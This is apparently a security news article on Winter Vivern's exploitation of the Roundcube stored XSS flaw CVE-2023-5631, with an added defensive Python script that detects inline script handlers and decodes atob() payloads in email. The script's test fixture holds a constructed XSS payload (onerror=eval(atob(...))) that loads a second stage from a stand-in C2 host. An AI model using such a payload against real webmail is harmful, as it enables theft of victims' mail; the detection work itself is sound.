Security researchers at ESET have caught the threat actor Winter Vivern, also tracked as TA473 and UAC-0114, exploiting a zero-day vulnerability in Roundcube Webmail.
The flaw, CVE-2023-5631 (CVSS score 5.4), was observed being exploited on October 11, 2023, before any patch existed. ESET researcher Matthieu Faou noted the escalation this represents: until now, Winter Vivern had relied on known vulnerabilities in Roundcube and Zimbra for which proofs-of-concept were publicly available.
Winter Vivern Exploiting CVE-2023-5631 in Roundcube
Winter Vivern, whose targeting aligns with the interests of Belarus and Russia, has in recent months gone after Ukraine, Poland, and government entities across Europe and India. The group exploited an older Roundcube cross-site scripting flaw, CVE-2020-35730, in August and September 2023, making it the second nation-state group after APT28 to target the open-source webmail software.
CVE-2023-5631 is a stored cross-site scripting (XSS) flaw: the malicious script is carried in the email itself and fires whenever Roundcube renders that message in the victim's browser, so no interaction beyond viewing the message is required. The attack message is a phishing email whose HTML source carries a Base64-encoded payload; when the message is opened, the payload is decoded and run as arbitrary JavaScript in the context of the victim's webmail session. A fix was released on October 16, 2023.
Faou described the chain: the crafted message causes the Roundcube user's browser to load attacker-controlled JavaScript, which in turn fetches a second-stage script, checkupdate.js. That script acts as a loader for the final payload, which exfiltrates the victim's email messages to a command-and-control (C2) server. Because every stage runs inside the authenticated webmail session, the payload can read the mailbox with the victim's own privileges.
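The loader pattern described above can be hunted for in stored mail. The following Python script is an added example, not ESET's or Roundcube's code: it parses a message with the standard library, enumerates inline event-handler attributes and javascript: URIs in every text/html part (the attribute-level vectors a webmail HTML sanitizer must close), and decodes any Base64 literal passed to atob() so the hidden first-stage JavaScript can be read in clear. The sample message, the c2.example.invalid host and the exact onerror/eval(atob()) construction are constructed assumptions for illustration, not the actual Winter Vivern payload.

```python
"""Triage HTML e-mail for inline script handlers and decode Base64 passed to atob().

Added example, not ESET's or Roundcube's code. The sample message below is
constructed for illustration; the onerror/eval(atob()) construction and the
c2.example.invalid host are assumptions, not the actual Winter Vivern payload.
"""
import base64
import email
import re
from email import policy
from html.parser import HTMLParser

# Inline event handlers (onerror, onload, ...) and javascript: URIs are the
# attribute-level vectors a webmail HTML sanitizer must strip before rendering.
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)
URI_ATTRS = {"href", "src", "xlink:href", "action", "formaction"}
ATOB_LITERAL = re.compile(r"""atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")


class ScriptSniffer(HTMLParser):
    """Collect (tag, attribute, value) for every script-bearing attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names and unescapes values,
        # so SVG elements such as <image> are seen like any other tag.
        for name, value in attrs:
            value = value or ""
            if EVENT_ATTR.match(name):
                self.findings.append((tag, name, value))
            elif name in URI_ATTRS and value.strip().lower().startswith("javascript:"):
                self.findings.append((tag, name, value))


def decode_atob_literals(js):
    """Return the decoded text of every atob('<base64>') literal found in js."""
    decoded = []
    for b64 in ATOB_LITERAL.findall(js):
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: not valid Base64
            continue
    return decoded


def triage_message(raw):
    """Parse a raw RFC 5322 message and report script-bearing attributes in its HTML parts."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    report = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        sniffer = ScriptSniffer()
        sniffer.feed(part.get_content())
        sniffer.close()
        for tag, attr, value in sniffer.findings:
            report.append({"tag": tag, "attr": attr, "value": value,
                           "decoded": decode_atob_literals(value)})
    return report


# Constructed sample (hypothetical host): a first-stage script hidden in Base64
# that would pull a second-stage loader into the victim's webmail session.
STAGE2_URL = "https://c2.example.invalid/checkupdate.js"
STAGE1_JS = ("var s=document.createElement('script');"
             f"s.src='{STAGE2_URL}';document.head.appendChild(s)")
STAGE1_B64 = base64.b64encode(STAGE1_JS.encode()).decode()

SAMPLE_EML = (
    "From: sender@example.invalid\r\n"
    "To: victim@example.invalid\r\n"
    "Subject: Account notice\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: text/html; charset="utf-8"\r\n'
    "\r\n"
    "<html><body><p>Please review the notice below.</p>\r\n"
    '<svg xmlns="http://www.w3.org/2000/svg">\r\n'
    f"<image href=\"x\" onerror=\"eval(atob('{STAGE1_B64}'))\"/>\r\n"
    "</svg></body></html>\r\n"
).encode()

# Constructed benign message: an ordinary https link must not be flagged.
BENIGN_EML = (
    "From: sender@example.invalid\r\n"
    "To: victim@example.invalid\r\n"
    "Subject: Lunch\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: text/html; charset="utf-8"\r\n'
    "\r\n"
    '<html><body><p>See <a href="https://intranet.example.invalid/menu">the menu</a>.</p></body></html>\r\n'
).encode()


if __name__ == "__main__":
    for hit in triage_message(SAMPLE_EML):
        print(f"<{hit['tag']} {hit['attr']}=...>")
        for js in hit["decoded"]:
            print("  decoded:", js)
```

Run over a mailbox dump, each hit points at the tag and attribute that carried script, and the decoded text shows what the first stage would fetch. A sanitizer-side check is the mirror image: an HTML part is only safe to render once every attribute the sniffer would flag has been removed.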
Winter Vivern's toolset is relatively unsophisticated, but the group is a significant threat because of its persistence, its regular phishing campaigns, and the number of internet-facing applications that remain unpatched against known vulnerabilities. Faou stressed prompt updating as the mitigation; for this flaw that means Roundcube 1.6.4, 1.5.5 or 1.4.15, the releases that contain the fix. Patching closes the hole but does not show whether it was already used: mail received before the update should be checked for the injected script, and any mailbox that rendered such a message should be assumed to have been read.